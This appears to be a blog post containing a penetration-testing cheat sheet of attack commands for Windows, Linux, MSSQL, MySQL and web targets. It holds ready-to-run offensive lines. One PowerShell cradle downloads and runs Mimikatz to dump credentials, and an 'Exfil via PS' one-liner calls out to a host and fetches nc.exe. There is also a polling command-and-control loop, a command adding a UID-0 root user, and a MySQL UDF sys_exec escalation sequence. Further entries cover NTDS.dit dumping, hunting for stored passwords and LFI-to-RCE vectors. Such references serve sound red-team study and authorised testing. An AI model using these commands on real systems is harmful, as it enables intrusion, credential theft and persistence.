Cheat Sheet

Windows

List Domain Controller
nltest /dsgetdc:domainname (does not work for XP)

net groups /domain

Pull system info
System info

Determine OS architecture
Wmic os get osarchitecture

Ping sweep
for /L %i in (1,1,255) do @ping -n 1 192.168.1.%i -w 100 | findstr "Reply"  

Determine OS Version
systeminfo | findstr /B /C:"OS Name"

Show all available shares
for /f %a in ('net view ^| findstr "\\"') do net view %a

Start new process from shell
start cmd.exe /c whoami

Determine PowerShell architecture
[intptr]::size (4=32, 8=64)

Dump Wireless Config
netsh wlan export profile name="Free Viruses Here" key="clear"


Yay
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://127.0.0.1/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"

CC
while (1) {$bob=((new-object net.webclient).downloadstring('http://ip/file')); if ($bob | select-string "WARNING") {echo "good"} else {echo "bad"}; sleep(60)}

 Get Domain Controllers (PowerShell)
[system.directoryservices.activedirectory.domain]::getcurrentdomain().domaincontrollers

Exfil via PS
powershell.exe "$data = $host.version; $ip = 'http://192.168.1.1/'; $url = echo $ip$data; (new-object System.Net.WebClient).Downloadfile($url, 'nc.exe')"

Enum File Shares via PS
PS> dir \sharename -Recurse -Include *.txt,*.vbs,*.ps1,*.xml | Select-String -Pattern “username|password”

Level Up
exploits
dir /b /s unattend.xml
dir /b /s sysprep.inf
dir /b /s sysprep.xml
dir /b /s wdscapture.inf (win2k8)
dir /b /s *pass*

weak service perms
unquoted service paths
unquoted autoruns
weak directory perms for dll attack
weak binary perms
schtasks /query /fo list /v

AlwaysInstallElevated
echo %PATH%

accesschk.exe -p -f * | findstr -i "seassign setake sedebug seimpersonate"

findstr /S cpassword \\dc1.corp.com\sysvol\*.xml
ms14-068
kerberoast

Linux

Ping Sweep
for ((i=1; i<255; i++)) do ping -c 1 192.168.1.$i | grep "64 bytes"; done

Add new root user
useradd -o -u 0 [username]

Upgrade from a Shell to TTY via Python
python -c 'import pty;pty.spawn("/bin/bash")'

Find setuid/setgid Binaries
find / -perm +6000 -type f -exec ls -ld {} \; > setuid.txt
find / -type f -perm -4000 -o -perm -2000

ID System
cat /etc/lsb-release -- Ubuntu
cat /etc/redhat-release -- Redhat

Grep Folder
grep -ir "pass" ./*

SSH/Run CMD
ssh secret@127.0.0.1 -i key -p 22 'cat flag.txt'

MSSQL

Useful stored procedures
xp_cmdshell
xp_dirtree
xp_fileexist

xp_cmdshell 2005/2008
EXEC+master..sp_configure+'show+advanced+options',1;+RECONFIGURE+WITH+OVERRIDE;+EXEC+master..sp_configure+'xp_cmdshell',0;+RECONFIGURE+WITH+OVERRIDE;+EXEC+sp_configure+'show+advanced+options',0;+RECONFIGURE+WITH+OVERRIDE

MySQL

/var/lib/mysql/mysql/user.MYD

cat /etc/my.cnf | grep user
cat /etc/mysql/my.cnf | grep user

select @@plugin_dir
select 'x' into dumpfile 'c:\\mysql\\lib\\plugin::$INDEX_ALLOCATION'

UDF
select load_file('/etc/mysql/my.cnf');

# MySQL < 5.1
/usr/lib 
# MySQL >= 5.1
/usr/lib/mysql/plugin

use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/lib_mysqludf_sys.so'));
select * from foo into dumpfile '/usr/lib/lib_mysqludf_sys.so';
CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_bineval RETURNS int SONAME 'lib_mysqludf_sys.so';

Misc

NTDS.dit
secretsdump.py -system SYSTEM -ntds ntds.dit LOCAL

Dump metasploit output to a file
Spool filename.txt

Spool off

Create Java WAR file
jar cvf boom.war boom.jsp

Use Aircrack-ng to create WPA handshake file for cracking with Hashcat
 --Will create file called handshake.hccap

Aircrack-ng /tmp/handshake.cap -J handshake

Find juicy domain info

C:\>dir \\{domain}\SYSVOL\ /b /s | findstr /i "groups.xml services.xml
scheduledtasks.xml printers.xml drives.xml datasources.xml"


Crack NetLM Hashes

./rcracki_mt -h [first16ofhash] [RTable files]

opt/metasploit/tools/halflm_second.rb -n [NetLM HASH -p [first7] -s [Challenge seed]

Pesky Shellcode Chars

msfencode -b 'x00x0ax0d'

Run a DLL

Rundll32 c:\program.dll, @DllMain12


Malware Dropper/Payload Extensions
  • .vbs, .vba, .vbe, .vb
  • .wsh, .wsf, .wsc, .ws
  • .js, .jse
  • .hta (mshta.exe)



VNC? RLY?

RealVNC
HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\vncserver
Value: Password

TightVNC
HKEY_CURRENT_USER\Software\TightVNC\Server
Value: Password or PasswordViewOnly
TigerVNC
HKEY_LOCAL_USER\Software\TigerVNC\WinVNC4
Value: Password
UltraVNC
C:\Program Files\UltraVNC\ultravnc.ini
Value: passwd or passwd2
Read More: https://www.raymond.cc/blog/crack-or-decrypt-vnc-server-encrypted-password/



Sploitz

Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit
Linux Kernel <= 2.6.36-rc8 RDS privilege escalation exploit
Linux Kernel udev < 141 Local Privilege Escalation Exploit
Linux Kernel 2.4/2.6 - sock_sendpage() Local root


Crypto

OpenSSL AES Decrypt

openssl aes-256(128)-cbc -K 'key' -iv 'iv' -d -in secret.txt.enc -out plain.txt

OpenSSL AES Encrypt

openssl aes-256(128)-cbc -K 'key' -iv 'iv' -e -in secret.txt -out plain.txt.enc

Strong Algorithms
bcrypt
PBKDF2
scrypt

Web

LFI to RCE

logs (apache/ssh/error/etc)
php://input
/proc/self/environ
file descriptors (/proc/self/fd/[0-255] || /proc/self/cmdline )

Links

Example Hashes

https://hashcat.net/wiki/doku.php?id=example_hashes

LFI/RFI Cheat Sheet

http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/

Python Tools

https://github.com/dloss/python-pentest-tools

CTF Tools

http://delimitry.blogspot.co.uk/2014/10/useful-tools-for-ctf.html

No comments:

Post a Comment